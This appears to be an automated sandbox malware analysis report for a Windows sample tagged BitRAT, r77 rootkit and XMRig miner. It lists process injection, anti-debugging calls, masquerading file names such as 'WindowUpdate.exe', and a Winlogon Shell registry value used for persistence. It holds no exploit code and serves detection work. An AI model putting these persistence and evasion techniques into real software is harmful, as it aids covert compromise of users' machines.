Malware Analysis Report

2025-01-02 06:58

Sample ID 220310-qsmakafcb7
Target 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128
SHA256 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128
Tags
bitrat r77 xmrig miner persistence rootkit trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128

Threat Level: Known bad

The file 62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128 was found to be: Known bad.

Malicious Activity Summary

bitrat r77 xmrig miner persistence rootkit trojan

xmrig

Modifies WinLogon for persistence

r77 rootkit payload

BitRAT

r77

XMRig Miner Payload

Executes dropped EXE

Checks computer location settings

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Program crash

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-03-10 13:31

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-03-10 13:31

Reported

2022-03-10 13:34

Platform

win7-20220223-en

Max time kernel

4294178s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe"

Signatures

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1720 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 552 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1244 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1244 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1244 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1244 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1128 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1128 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1128 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1128 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 1720 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

Processes

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

"C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe"

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

Network

N/A

Files

memory/1720-54-0x0000000000170000-0x0000000000692000-memory.dmp

memory/1720-55-0x0000000074580000-0x0000000074C6E000-memory.dmp

memory/1720-56-0x0000000004E00000-0x0000000004E01000-memory.dmp

memory/1720-57-0x0000000006250000-0x0000000006758000-memory.dmp

memory/1720-58-0x0000000000810000-0x000000000082C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-03-10 13:31

Reported

2022-03-10 13:35

Platform

win10v2004-en-20220112

Max time kernel

162s

Max time network

165s

Command Line

"C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe"

Signatures

BitRAT

trojan bitrat

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\WindowUpdate.exe\"," C:\Users\Admin\AppData\Roaming\WindowUpdate.exe N/A

r77

rootkit r77

r77 rootkit payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

XMRig Miner Payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\WindowUpdate.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe N/A
Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings C:\Users\Admin\AppData\Roaming\WindowUpdate.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\WindowUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\WindowUpdate.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3768 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 3768 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 3768 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 3768 wrote to memory of 648 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 3768 wrote to memory of 648 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 3768 wrote to memory of 648 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 3768 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 3768 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 3768 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 3768 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
